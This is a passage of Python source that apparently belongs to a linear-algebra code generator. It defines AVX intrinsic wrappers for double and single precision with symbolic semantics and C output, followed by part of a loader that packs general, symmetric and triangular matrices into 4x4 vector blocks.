return indent + "_mm256_mul_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256MulPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256DivPd(RValue):
def __init__(self, src0, src1):
super(mm256DivPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0] / src1[0], src0[1] / src1[1], src0[2] / src1[2], src0[3] / src1[3] ]
def unparse(self, indent):
return indent + "_mm256_div_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256DivPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256SqrtPd(RValue):
def __init__(self, src):
super(mm256SqrtPd, self).__init__()
self.srcs += [ src ]
def unparse(self, indent):
return indent + "_mm256_sqrt_pd(" + self.srcs[0].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256SqrtPd( " + self.srcs[0].printInst("") + " )"
class mm256HaddPd(RValue):
def __init__(self, src0, src1):
super(mm256HaddPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0]+src0[1], src1[0]+src1[1], src0[2]+src0[3], src1[2]+src1[3] ]
def unparse(self, indent):
return indent + "_mm256_hadd_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256HaddPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256SetzeroPd(RValue):
def __init__(self):
super(mm256SetzeroPd, self).__init__()
def computeSym(self, nameList):
return [ sympify(0), sympify(0), sympify(0), sympify(0) ]
def unparse(self, indent):
return indent + "_mm256_setzero_pd()"
def printInst(self, indent):
return indent + "mm256SetzeroPd()"
class mm256Permute2f128Pd(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256Permute2f128Pd, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def select4(self, src0, src1, control, ifzero):
imm = 0
if control[0]:
return [ifzero]*2
for bit in control[2:]:
imm = (imm << 1) | int(bit)
if imm == 0:
return [src0[i] for i in range(2)]
if imm == 1:
return [src0[i] for i in range(2,4)]
if imm == 2:
return [src1[i] for i in range(2)]
if imm == 3:
return [src1[i] for i in range(2,4)]
def computeSym(self, nameList): # To be fixed (more general)
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return self.select4(src0, src1, self.immBitList[4:], sympify(0)) + self.select4(src1, src1, self.immBitList[:4], sympify(0)) # Is the def in Intrinsics guide buggy??
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return self.select4(s0ZMask, s1ZMask, self.immBitList[4:], 1) + self.select4(s1ZMask, s1ZMask, self.immBitList[:4], 1) # Is the def in Intrinsics guide buggy??
def unparse(self, indent):
return indent + "_mm256_permute2f128_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256Permute2f128Pd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
class mm256PermutePd(RValue):
def __init__(self, src, immBitList):
super(mm256PermutePd, self).__init__()
self.srcs += [ src ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
return [ src[1] if self.immBitList[3] else src[0], src[1] if self.immBitList[2] else src[0], src[3] if self.immBitList[1] else src[2], src[3] if self.immBitList[0] else src[2] ]
def getZMask(self):
sZMask = self.srcs[0].getZMask()
return [ sZMask[1] if self.immBitList[3] else sZMask[0], sZMask[1] if self.immBitList[2] else sZMask[0], sZMask[3] if self.immBitList[1] else sZMask[2], sZMask[3] if self.immBitList[0] else sZMask[2] ]
def unparse(self, indent):
return indent + "_mm256_permute_pd(" + self.srcs[0].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256PermutePd( " + self.srcs[0].printInst("") + ", " + str(self.immBitList) + " )"
class mm256ShufflePd(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256ShufflePd, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[self.immBitList[3]], src1[self.immBitList[2]], src0[2 + self.immBitList[1]], src1[2 + self.immBitList[0]] ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s0ZMask[self.immBitList[3]], s1ZMask[self.immBitList[2]], s0ZMask[2 + self.immBitList[1]], s1ZMask[2 + self.immBitList[0]] ]
def unparse(self, indent):
return indent + "_mm256_shuffle_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256ShufflePd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
class mm256UnpackloPd(RValue):
def __init__(self, src0, src1):
super(mm256UnpackloPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0], src1[0], src0[2], src1[2] ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s0ZMask[0], s1ZMask[0], s0ZMask[2], s1ZMask[2] ]
def unparse(self, indent):
return indent + "_mm256_unpacklo_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256UnpackloPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256UnpackhiPd(RValue):
def __init__(self, src0, src1):
super(mm256UnpackhiPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[1], src1[1], src0[3], src1[3] ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s0ZMask[1], s1ZMask[1], s0ZMask[3], s1ZMask[3] ]
def unparse(self, indent):
return indent + "_mm256_unpackhi_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256UnpackhiPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256BlendPd(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256BlendPd, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def computeSym(self, nameList):
e = 3
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src1[i] if self.immBitList[e-i] else src0[i] for i in range(e) ]
def getZMask(self):
e = 3
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s1ZMask[i] if self.immBitList[e-i] else s0ZMask[i] for i in range(e) ]
def unparse(self, indent):
return indent + "_mm256_blend_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256BlendPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
class mm256LoaduPs(RValue, VecAccess):
def __init__(self, pointer, zeromask=None):
super(mm256LoaduPs, self).__init__()
self.reglen = 8
self.mrmap = range(self.reglen)
self.zeromask = [0]*self.reglen
if zeromask is not None:
for pos in zeromask:
self.zeromask[pos] = 1
self.pointer = pointer
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
return [ sympify(p+'_'+str(i)) for i in range(self.reglen) ]
def getZMask(self):
return self.zeromask
def unparse(self, indent):
return indent + "_mm256_loadu_ps(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "mm256LoaduPs( " + self.pointer.printInst("") + " )"
def __eq__(self, other):
return isinstance(other, mm256LoaduPs) and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256LoaduPs"), self.pointer.mat, self.pointer.at))
class mm256MaskloadPs(RValue, VecAccess):
def __init__(self, pointer, vecmask, zeromask=None):
super(mm256MaskloadPs, self).__init__()
self.reglen = 8
self.mrmap = []
self.zeromask = []
for m,i in zip(vecmask,range(8)):
self.mrmap += [i] if m else [-1]
self.zeromask += [0] if m else [1]
if zeromask is not None:
for pos in zeromask: # there should at most be 1 pos == 0 here
self.zeromask[pos] = 1
self.pointer = pointer
self.vecmask = vecmask
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
res = []
for m,i in zip(self.vecmask,range(self.reglen)):
res += [sympify(p+'_'+str(i))] if m else [sympify(0)]
return res
def getZMask(self):
return self.zeromask
def unparse(self, indent):
vm = "_mm256_setr_epi32("
for m,i in zip(self.vecmask,range(self.reglen)):
vm += "(int)1 << 31" if m else "0"
vm += ", " if i<7 else ")"
return indent + "_mm256_maskload_ps(" + self.pointer.unparse("") + ", " + vm + ")"
def printInst(self, indent):
return indent + "mm256MaskloadPs( " + self.pointer.printInst("") + ", " + str(self.vecmask) + ")"
def __eq__(self, other):
return isinstance(other, mm256MaskloadPs) and self.vecmask == other.vecmask and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256MaskloadPs"), hash(tuple(self.vecmask)), self.pointer.mat, self.pointer.at))
class mm256BroadcastSs(RValue, VecAccess):
def __init__(self, pointer, zeromask=None):
super(mm256BroadcastSs, self).__init__()
self.reglen = 8
self.mrmap = [tuple(range(self.reglen))]
self.zeromask = [0]*self.reglen
if zeromask is not None: # In this case all the positions have to be zero
self.zeromask = [1]*self.reglen
self.pointer = pointer
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
return [ sympify(p+'_0') ]*self.reglen
def getZMask(self):
return self.zeromask
def unparse(self, indent):
return indent + "_mm256_broadcast_ss(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "mm256BroadcastSs( " + self.pointer.printInst("") + " )"
def __eq__(self, other):
return isinstance(other, mm256BroadcastSs) and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256BroadcastSs"), self.pointer.mat, self.pointer.at))
class mm256StoreuPs(MovStatement):
mrmap = range(8) # static definition of the mem-reg mapping imposed by the store
def __init__(self, src, dst):
super(mm256StoreuPs, self).__init__()
self.dst = VecDest(dst, 8, self.mrmap) if isinstance(dst, Pointer) else VecDest(dst.pointer, 8, self.mrmap)
self.srcs += [ src ]
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
@staticmethod
def canStore(reglen, mrmap, horizontal=True, isAligned=False):
if not horizontal: return False
return reglen == 8 and mrmap == mm256StoreuPs.mrmap
@staticmethod
def getStore(src, dst):
return mm256StoreuPs(src, dst)
def computeSym(self, nameList):
return self.srcs[0].computeSym(nameList)
def unparse(self, indent):
return indent + "_mm256_storeu_ps(" + self.dst.unparse("") + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "mm256StoreuPs( " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
class mm256MaskstorePs(MovStatement):
def __init__(self, vecmask, src, dst):
super(mm256MaskstorePs, self).__init__()
self.mrmap = []
for m,i in zip(vecmask,range(8)):
self.mrmap += [i] if m else [-1]
self.dst = VecDest(dst, 8, self.mrmap) if isinstance(dst, Pointer) else VecDest(dst.pointer, 8, self.mrmap)
self.srcs += [ src ]
self.vecmask = vecmask
@staticmethod
def canStore(reglen, mrmap, horizontal=True, isAligned=False):
if not horizontal: return False
itcan = True
for m,i in zip(mrmap,range(8)):
itcan = itcan and (m == i or m == -1)
return reglen == 8 and itcan
@staticmethod
def getStore(src, dst):
vecmask = [ (0 if r == -1 else 1) for r in dst.mrmap ]
vecmask.extend([0 for _ in range(len(dst.mrmap), 8)])
return mm256MaskstorePs(vecmask, src, dst)
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
res = []
for m,i in zip(self.vecmask,range(4)):
res += [src[i]] if m else ["-"]
return res
def unparse(self, indent):
vm = "_mm256_setr_epi32("
for m,i in zip(self.vecmask,range(8)):
vm += "(int)1 << 31" if m else "0"
vm += ", " if i<7 else ")"
return indent + "_mm256_maskstore_ps(" + self.dst.unparse("") + ", " + vm + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "mm256MaskstorePs( " + str(self.vecmask) + ", " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
class mm256AddPs(RValue):
def __init__(self, src0, src1):
super(mm256AddPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[i] + src1[i] for i in range(8) ]
def unparse(self, indent):
return indent + "_mm256_add_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256AddPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256SubPs(RValue):
def __init__(self, src0, src1):
super(mm256SubPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[i] - src1[i] for i in range(8) ]
def unparse(self, indent):
return indent + "_mm256_sub_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256SubPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256MulPs(RValue):
def __init__(self, src0, src1):
super(mm256MulPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[i] * src1[i] for i in range(8) ]
def unparse(self, indent):
return indent + "_mm256_mul_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256MulPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256HaddPs(RValue):
def __init__(self, src0, src1):
super(mm256HaddPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
lane0 = [ src0[0]+src0[1], src0[2]+src0[3], src1[0]+src1[1], src1[2]+src1[3] ]
lane1 = [ src0[4]+src0[5], src0[6]+src0[7], src1[4]+src1[5], src1[6]+src1[7] ]
return lane0 + lane1
def unparse(self, indent):
return indent + "_mm256_hadd_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256HaddPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256Permute2f128Ps(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256Permute2f128Ps, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def select4(self, src0, src1, control, ifzero):
imm = 0
if control[0]:
return [ifzero]*4
for bit in control[2:]:
imm = (imm << 1) | int(bit)
if imm == 0:
return [src0[i] for i in range(4)]
if imm == 1:
return [src0[i] for i in range(4,8)]
if imm == 2:
return [src1[i] for i in range(4)]
if imm == 3:
return [src1[i] for i in range(4,8)]
def computeSym(self, nameList): # To be fixed (more general)
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return self.select4(src0, src1, self.immBitList[4:], sympify(0)) + self.select4(src1, src1, self.immBitList[:4], sympify(0)) # Is the def in Intrinsics guide buggy??
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return self.select4(s0ZMask, s1ZMask, self.immBitList[4:], 1) + self.select4(s1ZMask, s1ZMask, self.immBitList[:4], 1) # Is the def in Intrinsics guide buggy??
def unparse(self, indent):
return indent + "_mm256_permute2f128_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256Permute2f128Ps( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
class mm256UnpackloPs(RValue):
def __init__(self, src0, src1):
super(mm256UnpackloPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
lane0 = [ src0[0], src1[0], src0[1], src1[1] ]
lane1 = [ src0[4], src1[4], src0[5], src1[5] ]
return lane0 + lane1
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
lane0 = [ s0ZMask[0], s1ZMask[0], s0ZMask[1], s1ZMask[1] ]
lane1 = [ s0ZMask[4], s1ZMask[4], s0ZMask[5], s1ZMask[5] ]
return lane0 + lane1
def unparse(self, indent):
return indent + "_mm256_unpacklo_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256UnpackloPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256UnpackhiPs(RValue):
def __init__(self, src0, src1):
super(mm256UnpackhiPs, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
lane0 = [ src0[2], src1[2], src0[3], src1[3] ]
lane1 = [ src0[6], src1[6], src0[7], src1[7] ]
return lane0 + lane1
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
lane0 = [ s0ZMask[2], s1ZMask[2], s0ZMask[3], s1ZMask[3] ]
lane1 = [ s0ZMask[6], s1ZMask[6], s0ZMask[7], s1ZMask[7] ]
return lane0 + lane1
def unparse(self, indent):
return indent + "_mm256_unpackhi_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256UnpackhiPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256BlendPs(RValue):
def __init__(self, src0, src1, immBitList):
super(mm256BlendPs, self).__init__()
self.srcs += [ src0, src1 ]
self.immBitList = immBitList
imm = 0
for bit in immBitList:
imm = (imm << 1) | int(bit)
self.imm = imm
def computeSym(self, nameList):
e = 7
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src1[i] if self.immBitList[e-i] else src0[i] for i in range(e) ]
def getZMask(self):
e = 7
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
return [ s1ZMask[i] if self.immBitList[e-i] else s0ZMask[i] for i in range(e) ]
def unparse(self, indent):
return indent + "_mm256_blend_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + str(self.imm) + ")"
def printInst(self, indent):
return indent + "mm256BlendPs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immBitList) + " )"
class mm256ShufflePs(RValue):
def __init__(self, src0, src1, immTuple):
super(mm256ShufflePs, self).__init__()
self.srcs += [ src0, src1 ]
self.immTuple = tuple(immTuple)
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
lane0 = [ src0[self.immTuple[3]], src0[self.immTuple[2]], src1[self.immTuple[1]], src1[self.immTuple[0]] ]
lane1 = [ src0[4 + self.immTuple[3]], src0[4 + self.immTuple[2]], src1[4 + self.immTuple[1]], src1[4 + self.immTuple[0]] ]
return lane0 + lane1
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
lane0 = [ s0ZMask[self.immTuple[3]], s0ZMask[self.immTuple[2]], s1ZMask[self.immTuple[1]], s1ZMask[self.immTuple[0]] ]
lane1 = [ s0ZMask[4 + self.immTuple[3]], s0ZMask[4 + self.immTuple[2]], s1ZMask[4 + self.immTuple[1]], s1ZMask[4 + self.immTuple[0]] ]
return lane0 + lane1
def unparse(self, indent):
return indent + "_mm256_shuffle_ps(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", _MM_SHUFFLE" + str(self.immTuple) + ")"
def printInst(self, indent):
return indent + "mm256ShufflePs( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + ", " + str(self.immTuple) + " )"
class mm256SetzeroPs(RValue):
def __init__(self):
super(mm256SetzeroPs, self).__init__()
def computeSym(self, nameList):
return [ sympify(0) ]*8
def unparse(self, indent):
return indent + "_mm256_setzero_ps()"
def printInst(self, indent):
return indent + "mm256SetzeroPs()"
class _Dbl4Loader(Loader):
def __init__(self):
super(_Dbl4Loader, self).__init__()
def loadMatrix(self, mParams):
src, dst = mParams['m'], mParams['nuM']
sL, sR = mParams['mL'], mParams['mR']
dL, dR = mParams['nuML'], mParams['nuMR']
M, N = mParams['M'], mParams['N']
nuMM, nuMN = mParams['nuMM'], mParams['nuMN']
isCompact = mParams['compact']
mStruct, mAccess = mParams['struct'], mParams['access']
instructions = []
nu = 4
instructions.append(Comment('AVX Loader:'))
if Matrix.testGeneral(mStruct, mAccess, M, N):
# if (len(mStruct) == 1 and Matrix in mStruct) or (M!=N):
if M == 1 and N == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
# vmask = [1] + 7*[0]
pa = AddressOf(sa(src[sL.of(0),sR.of(0)]))
if mParams['bcast']:
va = mm256LoadGd(pa, [tuple(range(nu))])
else:
va = mm256LoadGd(pa, [0])
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
pc = Pointer(dst[dL.of(0),dR.of(0)])
horizontal = M==1
pa = Pointer(src[sL.of(0),sR.of(0)])
va = mm256LoadGd(pa, range(max(M,N)), isCompact=isCompact, horizontal=horizontal)
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif ((M < nu and N < nu) or (M == nu and N > 1 and N < nu) or (M > 1 and M < nu and N == nu)):
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
pas = [ Pointer(src[sL.of(i),sR.of(0)]) for i in range(M) ]
vas = [ mm256LoadGd(pas[i], range(N)) for i in range(M) ]
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ mm256StoreGd(vas[i], pcs[i], range(nu)) for i in range(M) ]
instructions += [ mm256StoreGd(mm256SetzeroPd(), pcs[i], range(nu)) for i in range(M,nu) ]
elif Symmetric.testLower(mStruct, mAccess, M, N):
# elif M == N and mAccess.intersect(Map("{[i,j]->[i,j]}")) != mAccess: #mAccess != Map("{[i,j]->[i,j]}"):
# if mAccess == Map("{[i,j]->[i,j]: j<=i}").union(Map("{[i,j]->[j,i]: j>i}")):
#LSymm
vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(i+1), isCompact) for i in range(0, M-1)]
vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(0)]), range(M), isCompact))
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
if M == 1:
rows = vs
elif M == 2:
rows = [ mm256ShufflePd(vs[0], vs[1], (0,0,0,0)) ]
rows.extend(vs[1:])
elif M == 3:
r2to1 = mm256ShufflePd(vs[0], vs[1], (0,0,0,0))
r3to1 = mm256Permute2f128Pd(r2to1, vs[2], (0,0,1,0,0,0,0,0))
rows = [ mm256BlendPd(r3to1, vs[0], (1,0,0,0)) ]
r3to2 = mm256Permute2f128Pd(vs[1], vs[2], (0,0,1,0,0,0,0,0))
rows.append( mm256BlendPd(mm256PermutePd(r3to2, (0,1,1,0)), vs[0], (1,0,0,0)) )
rows.extend(vs[2:])
else:
r2to1 = mm256ShufflePd(vs[0], vs[1], (0,0,0,0))
r3p4i = mm256ShufflePd(vs[2], vs[3], (0,0,0,0))
rows = [ mm256Permute2f128Pd(r2to1, r3p4i, (0,0,1,0,0,0,0,0)) ]
r3p4ii = mm256ShufflePd(vs[2], vs[3], (0,0,1,1))
rows.append( mm256Permute2f128Pd(vs[1], r3p4ii, (0,0,1,0,0,0,0,0)) )
rows.append( mm256BlendPd(vs[2], r3p4ii, (1,1,0,0)) )
rows.append( vs[3] )
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'LowSymm'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(rows, pcs)]
instructions.extend([comm] + instrs)
elif Symmetric.testUpper(mStruct, mAccess, M, N):
# elif mAccess == Map("{[i,j]->[j,i]: j<i}").union(Map("{[i,j]->[i,j]: j>=i}")):
#USymm
vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(i)]), range(i,M), isCompact) for i in range(0, M-1)]
vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(M-1)]), [M-1], isCompact))
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
if M == 1:
rows = vs
elif M == 2:
rows = [ vs[0] ]
rows.append( mm256ShufflePd(vs[0], vs[1], (0,0,1,1)) )
rows.extend(vs[2:])
elif M == 3:
rows = [ vs[0] ]
r1to2 = mm256ShufflePd(vs[0], vs[1], (0,0,1,1))
rows.append( mm256BlendPd(r1to2, vs[1], (1,1,0,0)) )
r1p2 = mm256ShufflePd(vs[0], vs[1], (0,0,0,0))
rows.append( mm256Permute2f128Pd(r1p2, vs[2], (0,0,1,1,0,0,0,1)) )
rows.append(vs[3])
else:
rows = [ vs[0] ]
r1to2 = mm256ShufflePd(vs[0], vs[1], (0,0,1,1))
rows.append( mm256BlendPd(r1to2, vs[1], (1,1,0,0)) )
r1p2 = mm256ShufflePd(vs[0], vs[1], (0,0,0,0))
rows.append( mm256Permute2f128Pd(r1p2, vs[2], (0,0,1,1,0,0,0,1)) )
r1p2 = mm256ShufflePd(vs[0], vs[1], (1,1,0,0))
r3p4 = mm256ShufflePd(vs[2], vs[3], (1,1,0,0))
rows.append( mm256Permute2f128Pd(r1p2, r3p4, (0,0,1,1,0,0,0,1)) )
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'UpSymm'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(rows, pcs)]
instructions.extend([comm] + instrs)
elif LowerUnitTriangular.test(mStruct, mAccess, M, N):
ones = mm256Set1Pd(V(1))
lds = [ mm256SetzeroPd() ]
lds.extend( [mm256LoadGd(Pointer(src[sL.of(i+1),sR.of(0)]), range(i+1), isCompact) for i in range(M-1)] )
vs = []
for i,v in enumerate(lds):
imm = 4*[0]
imm[3-i] = 1
vs.append( mm256BlendPd(v, ones, imm) )
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'LowUnitTriang'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
elif LowerTriangular.test(mStruct, mAccess, M, N):
vs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(i+1), isCompact) for i in range(M-1)]
vs.append(mm256LoadGd(Pointer(src[sL.of(M-1),sR.of(0)]), range(M), isCompact))
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'LowTriang'))
instrs = [mm256StoreGd(v, pc, [0, 1, 2, 3]) for v, pc in zip(vs, pcs)]
instructions.extend([comm] + instrs)
elif UpperUnitTriangular.test(mStruct, mAccess, M, N):
ones = mm256Set1Pd(V(1))
lds = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(i+1)]), range(i+1,M), isCompact) for i in range(M-1)]
lds.append( mm256SetzeroPd() )
vs = []
for i,v in enumerate(lds):
imm = 4*[0]
imm[3-i] = 1
vs.append( mm256BlendPd(v, ones, imm) )
vs.extend([mm256SetzeroPd() for _ in range(M, 4)])
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(4)]
comm = Comment('%dx%d -> 4x4 - %s' % (M, N, 'UpperUnitTriang'))
